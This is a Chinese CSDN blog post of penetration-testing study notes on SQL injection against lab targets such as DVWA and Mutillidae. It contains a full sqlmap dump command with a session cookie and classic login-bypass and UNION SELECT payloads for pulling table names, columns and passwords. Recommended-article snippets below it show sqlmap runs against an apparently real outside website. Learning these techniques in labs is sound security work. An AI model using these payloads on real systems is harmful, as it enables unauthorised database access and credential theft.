kali渗透测试与教学笔记3:sql注入

最新推荐文章于 2024-03-27 17:19:51 发布
最新推荐文章于 2024-03-27 17:19:51 发布
阅读量466 收藏
点赞数
分类专栏: kali 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lm19770429/article/details/105627066
版权

web应用渗透测试技术:sql注入

以魔鬼训练营为例,书中用的是tamper data 插件,现在用burpsuite截获网页数据,注意要获取cookies数据

练习地址:

IBM的测试地址http://www.testfire.net/index.jsp

http://10.10.10.129/mutillidae/index.php?page=login.php

  • sqlmap:

查看到字段的语句如下

sqlmap -u 'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit' --cookie='security=low; PHPSESSID=5bthna6rgifdi55n5c1sbl9pe7' --batch -D dvwa -T users -C user,passwd,user_id --dump


这里需要注意的是,DVWA网站,如果安全级别是“high”的情况,是扫不出来的。

  • XSS漏洞探测之扫描Mutillidae应用,地址:http://10.10.10.129/mutillidae/

利用w3af进行,设置如下

也可以使用acunetix、openvas、nessus

还可以用wXf这个软件。表示没有用过。

  • sql注入:

常用:

' or '1=1

’ or 1=1 --'   通过--,注释掉后面的验证,不同数据库注释语句不一样,要查查

可以结合sql语句其他方法进行注入:

原理:union 用于合并2个表,要求两个表有相同列数

用union列出字段探测:' union select 1 --',出错说明列数不相同,继续加列数' union select 1,2 --'直到探测出正确字段个数结果

利用这个方法查询一些有意义的数据库信息:

列出mysql系统中的所有数据表格名称

'union select 1,table_name from INFORMATION_SCHEMA.tables -- ' 注意最后要有空格

列出users数据表格字段

' union select 1,column_name from INFORMATION_SCHEMA.columns where table_name='users' -- '

列出users表中的password字段的值:

' union select NULL,password from users -- '

最后,用concat()把想要的信息合成一起,显示出来:

' union select 1,concat(first_name,' ',last_name,' ',password) from users -- '

基本理论到此结束。

实战一下,通过以上,似乎可以进行简单sql注入,但是心里没底。真正的实战来了:

盲注,字符的拆半拆解和基于服务器响应的时间拆解

拆半拆解:

 

 

 

花纵酒
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用kali完成sql注入
pray030的博客
12-09 8861
使用kali完成sql注入 本文仅用于学术参考分享,如有侵权,请联系作者删除,请勿随意对网站进行sql注入 前期准备 1.kali虚拟机(自带sql注入所需工具) 2.能够进行注入的网站 实验步骤 1.查看是否可以sql注入 sqlmap -u ‘http://www.kfzhongzhou.com/cyjb_xx.asp?id=14’ GET 2.爆库 sqlmap -u ‘http://www.kfzhongzhou.com/cyjb_xx.asp?id=14’ --dbs 3.查看当前使用的是哪个
kalisql注入
03-19 648
ASP:1.网址后面加上一撇 ' 报错 and 1=1 正常显示,and1=2报错 网址:http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 (get注入)2.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbs --current-user (-u 输入目标网址 --dbs表示所有的数据库)3.结果显示出了服务器的...
网络安全:Kali Linux 进行SQL注入与XSS漏洞利用
最新发布
cronaldo91的博客
03-27 1591
(3) 查看Kali Linux (2022.4)系统IP地址。(2)查看Kali Linux (2022.4)系统版本。(5)Kali主机 ping Windows主机。(14)Windows主机弹出登录界面。(7)获取当前数据库指定的表的字段名。(4)Windows 查看IP地址。(6)获取当前数据库中所有表的名称。(8)获取指定库指定表指定字段的值。(1) LAMP(LNMP)平台。执行 (选择Execute)(15)beef获取账号及密码。(5)启动beef-xss。(9)beef获取目标主机。
Kali SQL注入--基于SQLi-Labs
black101的博客
07-20 1852
Kali SQL注入--基于SQLi-LabsSQLi-LabsSQL注入SQL注入的基本原理SQL注入初步实验一个结束语 SQLi-Labs SQLi-Labs是一个练习和理解SQL注入的非常合适的靶站平台,总共有75关,这里我选择它做我的实验环境来对结果进行展示。 SQL注入 SQL注入的基本原理 首先,这不是一篇极为完整的SQL注入整理,这只是一篇对原理的简单复习和介绍。 SQL注入的基本原理 这是正常的SQL语句 select * from user where id = '$id' limit
Kali学习笔记39:SQL手工注入(1)
weixin_30670965的博客
02-11 187
终于到了SQL注入 最大的、最经典的、最常见的Web漏洞就是SQL注入漏洞 SQL注入的原理这里就不说了,百度 打开DVWA,SQL注入测试模块 测试单引号,发现出错,于是想到测试语句: 1' or '1'='1 成功: 测试是否存在漏洞: 1' and '1'='1 如果返回数据,但是1' and '1'='0 不返回数据,代表存在sql注入 或者...
Kali渗透测试之DVWA系列7——SQL Injection(SQL注入
浅浅的博客
06-13 3776
目录 一、SQL注入 1、SQL注入漏洞原理 2、SQL注入类型 3、SQL注入过程 二、实验环境 三、实验步骤 安全级别:LOW 安全等级:Medium 安全级别:High 安全级别:Impossible 一、SQL注入 1、SQL注入漏洞原理 把SQL命令插入到Web表单提交、或输入域名、或页面提交的查询字符串中,从而达到欺骗服务器执行恶意的SQL命令。 2、S...
web渗透测试详细入门实践课程-kali/sql注入
06-20
本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源...
Kali Linux渗透测试技术详解 主编:杨波、王晓卉,李亚伟 PDF
05-20
Kali Linux渗透测试技术详解 主编:杨波、王晓卉,李亚伟 PDF
计算机病毒与防护:SQL注入漏洞的利用.ppt
06-10
SQLMAP 是一个开放源码的渗透测试工具,它可以自动探测和利用SQL注入漏洞来接管数据库服务器。它配备了一个强大的探测引擎,为最终渗透测试人员提供很多强大的功能,可以拖库,可以访问底层的文件系统,还可以通过带...
Kali渗透测试技术实战
07-24
硬盘最小120G,尤其是在密码破解、取证和做渗透测试项目的情况下,要求获得控制权限,大量生成数据、收集证据、生成日志和报告。 第三章 软件、补丁和升级 第四章 配置 kali 第五章渗透测试实验环境 第六章渗透测试...
Kali Linux渗透测试技术详解
02-19
第1篇为Iinux安全渗透测试基础,介绍了Linux安全透简介、安装及配置KaliLinux 操作系统、配置目标测试系统:第2篇为信息的收集及利用,介绍了信息收集、漏洞扫描、漏洞利用等技术:第3篇为各种渗透测试,介绍了权限...
5_SQL注入简介.pptx
08-20
数据库相关概念,SQL注入相关概念,注入漏洞分类SQL注入利用工具防御,SQL注入漏洞等相关攻防。
国外经典的SQL注入攻防教程中文版
11-13
最近看了不少老外写的东西,看时间相同的技术当铺比我们早了好长一段时间,比如ASP的SQL注射国外02年就出现了,PHP的也在04年出现,而我们一直到05年才接触到,看看比人家晚了多少时间呀! 为了尽快了解最新的技术动态,我坚持看E文资料,有的很长,有的很短,本人时间有限,不可能一一翻译过来,只能挑选自己认为比较适合大家看的东西翻译过来,希望你能从中学到东西。
w3af高级使用.pdf
03-02
w3af的高级用法,包括脚本扫描,登陆扫描等其他高级技巧。
渗透测试工具之sqlmap注入神器
qq_33441500的博客
10-17 681
渗透测试工具之sqlmap注入神器 一,sqlmap详解 sqlmap使用python编写的sql注入工具,暂仅支持pyth...
视频教程-web渗透测试详细入门实践课程-kali/sql注入-渗透测试
weixin_28836857的博客
05-28 608
web渗透测试详细入门实践课程-kali/sql注入 2010年从事网络技术...
kali mysql注入_利用kali自带的sqlmap注入sqli-labs-master
weixin_42552261的博客
01-27 413
sqlmap是一款爆破mysql数据的神器。这里我用sqlmap来演示爆破sqli-labs-master的数据库。GET型的sqlmap爆破。1、检测目标的版本sqlmap -u http://localhost/sqli-labs-master/Less-2/?id=1效果图如下:2、检测目标的数据库sqlmap -u http://localhost/sqli-labs-master/Les...
Kali渗透测试(九)——DVWA SQL 注入
Bulldozer_GD的博客
07-16 576
Kali渗透测试(九)——DVWASQL注入 一. 低级别,没有对用户输入做任何限制,提及的数据直接拼接。 1. 查询所有数据库 2. 查询dvwa库中的表名 查询字段名 4. 查询用户名密码 5.也可以进行操作系统级别的命令执行 6.无权读取information_schema ,拒绝 union/order by 时: 猜列名:利用burpsuite Intruder 和字典文件 ' and column is null--猜表名 ' and table.user is n
学习Kali渗透测试对就业帮助
09-02
3. 职业发展:Kali渗透测试是一个不断发展和变化的领域,通过学习和实践可以不断提升自己的技能水平,有机会在职业生涯中取得进一步的发展和晋升。 4. 自我提升:学习Kali渗透测试可以帮助你深入理解网络安全的原理...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值